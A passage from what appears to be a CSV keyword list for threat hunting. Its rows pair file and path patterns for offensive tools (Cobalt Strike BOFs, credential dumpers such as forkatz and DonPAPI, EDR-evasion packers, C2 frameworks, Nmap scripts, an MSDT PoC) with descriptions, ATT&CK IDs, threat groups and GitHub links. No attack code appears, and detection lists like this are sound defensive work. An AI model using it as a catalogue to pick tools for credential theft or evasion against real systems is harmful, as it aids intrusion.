T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/find_domain.sh*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/FindModule.c*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*/FindObjects.cna*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/FindObjects-BOF,1,1,N/A,10,10,263,50,2023-05-03T19:52:08Z,2021-01-11T09:38:52Z -*/FindSQLSrv.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/finger.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/fingerprint-strings.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/firefox_decrypt.git*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*/firefox_decrypt.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/firewalk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/firewall-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/flask:5000/supershell/*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/flatten-macho.m*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/flume-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Fodetect-hooksx64*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/Detect-Hooks,1,1,N/A,10,10,138,28,2021-07-22T20:13:16Z,2021-07-22T18:58:23Z -*/follina.py*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,1,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*/ForgeCert.git*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key 
to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*/forkatz.filters*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*/forkatz.git*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*/format:hashcat*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/FourEye.git*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/fox-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/fox-it/BloodHound*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/FreeFileSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/FreeFileSync_*_Windows_Setup.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/FreeFileSyncPortable_*.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data 
Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/freelancer-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Freeze.rs*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*/freyja.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/freyja_tcp/*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/fritzone/obfy*,offensive_tool_keyword,obfy,A tiny C++ obfuscation framework,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/fritzone/obfy,1,1,N/A,N/A,6,537,122,2020-06-10T13:28:32Z,2015-11-13T13:28:23Z -*/ftp-anon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-bounce.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/FtpC2/*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*/ftp-libopie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-proftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-syst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-vsftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ftp-vuln-cve2010-4221.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Fuck-Etw.git*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,1,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*/FuckThatPacker*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*/FudgeC2*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*/full-nelson.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/full-nelson64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/FunctionalC2/*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*/fuzz.txt*,offensive_tool_keyword,fuzz.txt,list of sensible files for fuzzing in system,T1210 - T1190 - T1203 - T1114,TA0002 - TA0003 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt,1,1,N/A,N/A,10,2669,479,2023-07-20T13:26:37Z,2016-01-19T13:35:44Z -*/fuzzers/dns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ftp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/http*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ntp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/smb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/smtp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/fuzzers/ssh*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/G0ldenGunSec/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 